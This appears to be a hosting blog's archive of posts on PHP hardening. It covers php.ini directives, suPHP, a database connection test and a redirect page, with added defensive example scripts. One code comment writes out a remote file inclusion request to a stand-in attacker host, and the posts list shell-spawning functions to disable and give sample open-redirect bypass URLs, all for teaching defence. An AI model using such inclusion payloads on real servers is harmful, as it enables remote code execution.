Archive for the tag 'PHP'

SBDavid

PHP Security

PHP as a module or as a CGI

Using PHP as a module is suitable for systems dedicated to a single purpose or for sites run by a trusted group of administrators and developers. Using PHP as a CGI (possibly with an execution wrapper such as suexec) is the better option when the people who write the scripts cannot be fully trusted.

When PHP is installed as a module, it becomes part of Apache and performs all operations as the Apache user (usually httpd). Every PHP script on the server then runs with that one identity, so a script on one virtual host can read anything the Apache user can read, including other sites' scripts and configuration files.

Using PHP as a CGI

Compiling PHP as a CGI is similar to compiling it for use as a module. This mode of operation is the default for PHP, so there is no need to specify an option on the configure line.

How much of the site has to change depends on how the CGI binary is invoked. If Apache is told to hand .php files to the interpreter (an Action and AddHandler directive pair, or a wrapper), the scripts themselves are untouched. If the scripts are instead run as ordinary CGI programs, each one needs a #! line naming the PHP binary, and migrating from module to CGI operation therefore requires modifying every script.

register_globals and allow_url_fopen

register_globals injects every request parameter (query string, POST body, cookies) into the script's global scope as an ordinary variable, so an attacker can preset any variable that a script forgets to initialise. The option is off by default as of PHP 4.2.0 and was removed in PHP 5.4.0.

allow_url_fopen lets programmers treat URLs as files: fopen(), file_get_contents() and, before PHP 5.2, include() and require() accept http:// and ftp:// paths, so a filename built from user input can pull code from a remote server. (From PHP 5.2.0 on, including a URL additionally requires allow_url_include, which defaults to Off.)

For security reasons, turn both options off in the php.ini file:

allow_url_fopen = Off
register_globals = Off
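As an added illustration, not part of the original post, the following script shows the pitfall each of the two directives creates beside code that stays safe whatever the directive is set to. The credential values, the pages/ directory, the request parameter names and the page allowlist are constructed for the example.

```php
<?php
// Added example: the register_globals and allow_url_fopen pitfalls beside
// code that does not depend on either directive. Credentials, the pages/
// directory and the allowlist are constructed for the example.

// --- register_globals ---
// Classic vulnerable pattern, as it would appear at script top level:
//
//   if ($user === 'admin' && $password === 'secret') { $authorized = true; }
//   if ($authorized) { show_admin_page(); }
//
// With register_globals = On, a request for page.php?authorized=1 defines
// $authorized before the first line runs, so the second test passes even
// though the credential check failed. The fix: initialise every variable
// and read request data only from the superglobals.
function is_authorized(array $request): bool
{
    $authorized = false;                            // never trust a pre-set value
    $user     = $request['user'] ?? '';
    $password = $request['password'] ?? '';
    if ($user === 'admin' && $password === 'secret') {   // constructed credentials
        $authorized = true;
    }
    return $authorized;
}

// --- allow_url_fopen ---
// Vulnerable pattern: include($_GET['page'] . '.php');
// With allow_url_fopen = On (and, from PHP 5.2, allow_url_include = On) the
// request page=http://attacker.example/evil fetches and executes remote code.
// Even with URLs disabled, a value that escapes the pages/ tree is a local
// file inclusion. The fix: accept only allowlisted names and confirm that the
// resolved path still lies inside the pages directory.
function resolve_page(string $requested, array $allowed, string $baseDir): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;                                // unknown page name: refuse
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    // realpath() collapses ../ and symlinks; require the result to stay under $base
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage with the live request (parameter names are assumptions):
$allowedPages = ['home', 'about', 'contact'];
$page = resolve_page($_GET['page'] ?? 'home', $allowedPages, __DIR__ . '/pages');
if ($page === null) {
    http_response_code(404);
    exit('no such page');
}
include $page;

// Separately, an authentication check that cannot be short-circuited:
$adminAllowed = is_authorized($_POST);
```

Note that resolve_page() refuses a request before touching the filesystem whenever the name is not on the list, so the realpath() containment test is a second line of defence rather than the only one.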

PHP uses modules (extensions) to extend its functionality dynamically. Unlike Apache, PHP can load a module programmatically, with the dl() function, from within a script. A dynamically loaded module integrates into PHP and runs with its full permissions, so a user who can upload a shared object and a script can bypass every restriction set in php.ini. Disable dynamic loading:

enable_dl = Off

Use the expose_php configuration directive to tell PHP to keep quiet about itself.

Setting this directive to Off prevents the PHP version from being added to the Server and X-Powered-By response headers and stops PHP from answering the special query strings that display its credits and logos:

expose_php = Off

The disable_functions and disable_classes directives take comma-separated lists of functions and classes that PHP should refuse to call. They can be set only in php.ini, not from a script, an .htaccess file or ini_set(), so a user cannot re-enable what the administrator disabled. Functions that spawn processes (exec(), system(), passthru(), shell_exec(), popen()) are the usual candidates.

The most useful security-related PHP directive is open_basedir. It tells PHP which files scripts may open. The value is a path prefix rather than a directory name, so /var/www also permits /var/www2; end the value with a slash to restrict access to the directory itself. Several prefixes are separated with a colon (a semicolon on Windows).

If every site's document root lives under /var/www, set:

open_basedir = /var/www/

When PHP is compiled with --enable-memory-limit (the option was dropped in PHP 5.2.1, since which the limit is always available), it becomes possible to cap the amount of memory a single script may consume. Use it to stop badly written scripts from exhausting the server's memory. The limit is set via the memory_limit option in the configuration file; 8M was ample for the scripts of the time, whereas PHP's own default is now 128M:

memory_limit = 8M

You can limit the size of the request body. Although the directive is named after POST, other request methods can carry a body, and the limit applies to all of them. Increase the value from the default shown below if you plan to allow large file uploads, and keep it at or above upload_max_filesize, because a body larger than post_max_size is discarded before the upload is processed:

post_max_size = 8M

The max_input_time option limits the time, in seconds, that PHP may spend parsing request input (query string, POST data and uploaded files) before the script itself starts:

max_input_time = 60

The max_execution_time option limits the time, in seconds, that a PHP script may spend running. On Unix the limit counts only the script's own execution time; time spent in system calls, database queries and other I/O outside the interpreter is not included:

max_execution_time = 30

File uploads can be turned on and off with the file_uploads directive. Leave them off unless a site needs them; a site that does should also keep upload_tmp_dir outside the document root:

file_uploads = Off
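The directives above are easy to set and easy to lose again after a package upgrade, so here, as an added example that is not part of the original post, is a script that compares the running configuration with the values recommended above and reports every mismatch. The recommended values are the ones quoted in the post; the list of process-spawning functions checked against disable_functions is an assumption.

```php
<?php
// Added example (not from the original post): compare the live PHP
// configuration with the php.ini settings recommended above and report
// every mismatch. Recommended values are those quoted in the post.

/** Map the many spellings of boolean ini values onto 'on' / 'off'. */
function normalise_ini(string $value): string
{
    $v = strtolower(trim($value));
    if (in_array($v, ['', '0', 'off', 'false', 'no'], true)) {
        return 'off';
    }
    if (in_array($v, ['1', 'on', 'true', 'yes'], true)) {
        return 'on';
    }
    return $v;
}

/**
 * Return directive => ['expected' => ..., 'actual' => ...] for each directive
 * whose live value differs from the recommendation. Directives this PHP build
 * no longer knows (ini_get() returns false) are skipped: register_globals and
 * safe_mode, for instance, do not exist from PHP 5.4 on.
 */
function audit_php_ini(array $recommended): array
{
    $problems = [];
    foreach ($recommended as $directive => $want) {
        $have = ini_get($directive);
        if ($have === false) {
            continue;
        }
        if (normalise_ini($have) !== normalise_ini((string) $want)) {
            $problems[$directive] = ['expected' => $want, 'actual' => $have];
        }
    }
    return $problems;
}

/** Return the functions from $shouldBeDisabled that disable_functions does not list. */
function missing_disabled_functions(array $shouldBeDisabled): array
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return array_values(array_diff($shouldBeDisabled, $disabled));
}

$recommended = [
    'register_globals'   => 'Off',
    'allow_url_fopen'    => 'Off',
    'enable_dl'          => 'Off',
    'expose_php'         => 'Off',
    'open_basedir'       => '/var/www/',
    'memory_limit'       => '8M',
    'post_max_size'      => '8M',
    'max_input_time'     => '60',
    'max_execution_time' => '30',
    'file_uploads'       => 'Off',
];

foreach (audit_php_ini($recommended) as $directive => $mismatch) {
    printf("%-20s expected %-12s actual %s\n",
        $directive, $mismatch['expected'], var_export($mismatch['actual'], true));
}
// Assumed list: the process-spawning functions named later in this post.
foreach (missing_disabled_functions(['exec', 'system', 'passthru', 'shell_exec', 'popen']) as $fn) {
    printf("%-20s not listed in disable_functions\n", $fn);
}
```

Run it once through the web server (the SAPI whose php.ini you care about) and remove it afterwards. From the command line the CLI SAPI forces max_execution_time to 0, so that row is only meaningful when the script is served by Apache; an empty string returned by ini_get() for a boolean directive means Off and is treated as such.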

Safe mode (http://www.php.net/manual/en/features.safe-mode.php) is an attempt by the PHP developers to enhance the security of shared PHP deployments. Once this mode is enabled, the PHP engine imposes a series of restrictions on scripts; most notably, a script may only open files owned by the same user as the script itself. Safe mode is a usability compromise rather than a security boundary: it was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so it exists only on older installations.

On an installation that still has it, start by turning safe mode on:

safe_mode = On

Safe mode restricts external process execution. Only binaries in the directory named by safe_mode_exec_dir can be executed from PHP scripts.

The following functions are affected:

• exec( )
• system( )
• passthru( )
• popen( )

Some methods of program execution do not work in safe mode:

shell_exec( ) Disabled in safe mode.
backtick operator Disabled in safe mode.
dl( ) Disabled in safe mode.

Hardened-PHP (http://www.hardened-php.net) is a project with the goal of remedying some of the shortcomings of the mainstream PHP distribution; its hardening patch later became the Suhosin extension.

Reference - http://www.php.net

SBDavid

Testing PHP-MySQL connection

dbHost = IP address or hostname of the database server
dbName = the database name
dbUser = the database user
dbPass = the password of that user

Add this script to your public_html (for example as dbtest.php), open it in a browser and check whether the user is able to connect. Delete the script as soon as the test is done: it holds the database credentials in a web-accessible directory. The mysql_* functions the original script used were removed in PHP 7; the mysqli equivalents below behave the same way.

<?php
// dbtest.php: fill in the four values, run once through the browser, then delete.
$dbHost = "";   // IP address or hostname of the database server
$dbName = "";   // database name
$dbUser = "";   // database user
$dbPass = "";   // password of that user

$link = mysqli_connect($dbHost, $dbUser, $dbPass)
    or die("could not connect: " . mysqli_connect_error());
mysqli_select_db($link, $dbName)
    or die("could not select db: " . mysqli_error($link));
echo "db selected";
mysqli_close($link);
?>

How to Add Custom Modules to php in DirectAdmin

If you want to add extra modules to PHP, they will most likely need to be compiled in. Any module that needs to be compiled in has a --with-module style configure flag which has to be added to the build. To add the flag, run the following:

cd /usr/local/directadmin/customapache
vi configure.php
# add your --with-module line to the end of the file,
# and make sure the \ character exists at the end of all lines except the last one.
./build clean
./build php

If you're using custombuild instead of customapache, edit the following configure file(s) and then repeat the steps above, using 'custombuild' instead of 'customapache' in the path:

/usr/local/directadmin/custombuild/configure/ap2/configure.php5
/usr/local/directadmin/custombuild/configure/ap2/configure.php4

Then restart apache

How to forward a website to another url using PHP

To do this, create the page that will do the forwarding. This can be any page, as long as its name ends in ".php". If you are redirecting a whole domain, create "index.php" inside the public_html directory.

<?php
// Send the client to the new location and stop; without exit, anything
// after the header() call would still run and be sent to the client.
header("Location: http://blog.serverbuddies.com", true, 301);
exit;
?>

Where http://blog.serverbuddies.com is the location you want the page to forward to. The 301 status marks the move as permanent so browsers and search engines update their records; use the default 302 for a temporary redirect. Never build the Location value from user input without validating it, or the page becomes an open redirect.
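As an added example that is not part of the original post, here is a redirect helper that validates the destination before sending the Location header, so that a destination taken from the request cannot be abused as an open redirect or to inject extra headers. The list of allowed hosts is an assumption for the example.

```php
<?php
// Added example (not from the original post): a redirect helper that refuses
// targets outside an allowlist of hosts. The host list is an assumption.

const ALLOWED_REDIRECT_HOSTS = ['blog.serverbuddies.com', 'www.serverbuddies.com'];

/** Return $url if it is an absolute http(s) URL on an allowed host, else null. */
function safe_redirect_target(string $url, array $allowedHosts): ?string
{
    // A CR or LF inside the value would let the caller append further headers.
    if (preg_match('/[\r\n]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                       // relative, protocol-relative (//host) or malformed
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                       // javascript:, data: and friends
    }
    $hosts = array_map('strtolower', $allowedHosts);
    if (!in_array(strtolower($parts['host']), $hosts, true)) {
        return null;                       // not one of our sites
    }
    return $url;
}

/** Redirect to $url if it passes validation; answer 400 otherwise. Never returns. */
function redirect_to(string $url, int $status = 302): void
{
    $target = safe_redirect_target($url, ALLOWED_REDIRECT_HOSTS);
    if ($target === null) {
        http_response_code(400);
        echo "invalid redirect target";
        exit;
    }
    header('Location: ' . $target, true, $status);
    exit;                                  // nothing after the header may be sent
}

// Fixed destination as in the post; a destination read from the request
// (for example $_GET['next']) goes through exactly the same function.
redirect_to('http://blog.serverbuddies.com', 301);
```

Checking the parsed host against an exact allowlist, rather than testing whether the string contains or starts with the site name, is what defeats values like http://blog.serverbuddies.com.attacker.example or http://attacker.example/blog.serverbuddies.com.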

SBDavid

Hardening PHP

Run As The User Instead of "nobody". You can run PHP as the user who owns the site (as CGI scripts do with Apache's suexec) instead of as the shared web server user.

Enable suPHP

With mod_suphp, PHP scripts are executed by the user who owns the VirtualHost serving the request, so a script on one site cannot read or write another site's files unless its owner could do so anyway.

Use Hardening Tools Like Suhosin

Remove Insecure Scripts (test pages such as dbtest.php, phpinfo() dumps and abandoned applications)

Apache directives like php_value and php_flag (in httpd.conf or .htaccess) are not honoured by mod_suphp, because they only reach the PHP Apache module. Instead, place a php.ini file in the directory containing the PHP script and specify these values in it.

For PHP scripts to execute, permissions of 0400 are sufficient. Scripts run as the user who owns the VirtualHost, and as long as that user has permission to write to a file or directory, the PHP scripts will also be able to write to it. mod_suphp performs various security checks before executing a PHP script (for example, that neither the script nor its directory is writable by others). Most of these can be disabled in the mod_suphp configuration file located at /opt/suphp/etc/suphp.conf; leave them enabled.
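To confirm that the suPHP setup described above is actually in effect, the following added example (not from the original post) reports the user PHP runs as, the owner of the script, and which php.ini the interpreter parsed. It assumes the posix extension is available for posix_geteuid(); remove the script once you have read the output.

```php
<?php
// Added example (not from the original post): report which user PHP runs as
// and compare it with the owner of this script. Under mod_suphp or suexec
// the two match; under mod_php the process is the shared Apache user and
// they differ. Needs the posix extension; remove the script after use.

/** Return the SAPI name, effective uid, script owner uid and whether they match. */
function suphp_status(string $script): array
{
    $processUid = function_exists('posix_geteuid') ? posix_geteuid() : null;
    $ownerUid   = fileowner($script);           // false if the file cannot be stat()ed
    return [
        'sapi'          => PHP_SAPI,            // 'cgi' or 'cgi-fcgi' with suPHP, 'apache2handler' with mod_php
        'process_uid'   => $processUid,
        'owner_uid'     => $ownerUid === false ? null : $ownerUid,
        'runs_as_owner' => $processUid !== null && $ownerUid !== false && $processUid === $ownerUid,
    ];
}

/**
 * Which php.ini was parsed. Since php_value lines in .htaccess are ignored
 * under mod_suphp, this is how to confirm that the per-directory php.ini
 * described above is the one in effect.
 */
function ini_source_hint(): string
{
    $loaded = php_ini_loaded_file();            // path of the php.ini parsed, or false
    return $loaded === false ? 'no php.ini loaded' : 'php.ini loaded from ' . $loaded;
}

header('Content-Type: text/plain');
$s = suphp_status(__FILE__);
printf("SAPI:             %s\nprocess uid:      %s\nscript owner uid: %s\nruns as owner:    %s\n%s\n",
    $s['sapi'],
    $s['process_uid'] ?? 'unknown (posix extension missing)',
    $s['owner_uid'] ?? 'unknown',
    $s['runs_as_owner'] ? 'yes' : 'no',
    ini_source_hint());
```

If "runs as owner" is "no" while the SAPI is still apache2handler, the request is being served by mod_php rather than mod_suphp, and none of the per-user isolation described above applies yet.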
